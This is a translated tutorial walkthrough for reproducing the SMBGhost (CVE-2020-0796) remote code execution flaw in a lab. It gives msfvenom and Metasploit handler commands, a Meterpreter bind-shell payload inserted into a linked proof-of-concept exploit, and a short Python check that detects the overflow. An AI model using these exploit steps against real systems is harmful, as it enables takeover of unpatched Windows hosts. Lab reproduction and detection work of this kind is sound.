Shulou (Shulou.com), 05/31 report. Updated 2025-01-18.
Many people who are new to this get stuck when trying to reproduce the CVE-2020-0796 vulnerability. This article summarizes the cause of the problem and the steps to reproduce it, in the hope that it helps you work through it.
I. Introduction to CVE-2020-0796
0x01 Vulnerability overview
CVE-2020-0796 is caused by a flaw in how the SMBv3 protocol handles maliciously crafted compressed packets: when decompressing a packet, the length supplied by the client is used without checking that it is valid, which results in an integer overflow. It allows a remote, unauthenticated attacker to execute arbitrary code on the target system, similar to EternalBlue.
Vulnerability Hazard Level: High
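The missing length check described above can be written as a detection rule over the SMB2 compression transform header. This is an added example, not code from the original article or from the tools it links; the field layout follows MS-SMB2 section 2.2.42, the function names are hypothetical, and the sample messages are constructed.

```python
import struct

# SMB2 COMPRESSION_TRANSFORM_HEADER (MS-SMB2 2.2.42), little-endian:
# ProtocolId(4) OriginalCompressedSegmentSize(4) CompressionAlgorithm(2)
# Flags(2) Offset(4)
HEADER = struct.Struct("<4sIHHI")
PROTOCOL_ID = b"\xfcSMB"  # marks a compressed message (plain SMB2 uses \xfeSMB)
U32_MAX = 0xFFFFFFFF


def check_transform_header(message: bytes) -> str:
    """Classify one SMB message (NetBIOS session header already removed).

    Hypothetical helper for an IDS or pcap-triage script.
    """
    if len(message) < HEADER.size or message[:4] != PROTOCOL_ID:
        return "not-compressed"
    _, original_size, _algorithm, _flags, offset = HEADER.unpack_from(message)
    payload_len = len(message) - HEADER.size
    # The check the vulnerable decompression path lacked: the two
    # client-supplied lengths are added together, so the sum must fit
    # in an unsigned 32-bit integer.
    if original_size + offset > U32_MAX:
        return "overflow"
    # Offset counts the uncompressed bytes between the header and the
    # compressed segment, so it can never exceed what was actually sent.
    if offset > payload_len:
        return "bad-offset"
    return "ok"


def build_message(original_size: int, offset: int, payload: bytes) -> bytes:
    """Constructed sample input: header with algorithm 1 (LZNT1) plus payload."""
    return HEADER.pack(PROTOCOL_ID, original_size, 1, 0, offset) + payload


if __name__ == "__main__":
    samples = {
        "plain SMB2": b"\xfeSMB" + b"\x00" * 60,
        "well-formed": build_message(0x100, 4, b"A" * 16),
        "wrapping sum": build_message(0xFFFFFFFF, 0x10, b"A" * 16),
        "offset past end": build_message(0x100, 64, b"A" * 16),
    }
    for name, msg in samples.items():
        print(f"{name}: {check_transform_header(msg)}")
```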
0x02 Affected versions
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
II. Experimental environment
Target machine: vulnerable Windows 10 virtual machine; system image:
ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/
IP address: 192.168.117.150
Notes after installing the image:
· Turn off the Windows 10 firewall so that the two machines can ping each other
· Turn off Windows 10 automatic updates so that the vulnerability is not patched
Detection tool:
https://github.com/dickens88/cve-2020-0796-scanner
Exploit (getshell) code:
https://github.com/chompie1337/SMBGhost_RCE_PoC
Attacker machine: Kali
IP address: 192.168.117.132
III. Reproduction process
1. First scan the target host with the detection tool and confirm that it is vulnerable.
python3 cve-2020-0796-scanner.py -t 192.168.117.150
2. Generate the shellcode with the msfvenom command:
msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt
Replace the USER_PAYLOAD part of exploit.py in the getshell code with the code in the generated shellcode.txt.
3. Open msf on Kali and use the handler module to start listening:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.117.150
set lport 3333
run
4. Run the modified exploit code:
python3 exploit.py -ip 192.168.117.150
5. In the msf console, the shell is obtained successfully.
6. If the output is garbled, run chcp 65001 so that it displays correctly.
The reproduction is complete.
IV. Errors that occur
Some errors in the modified source code need to be corrected.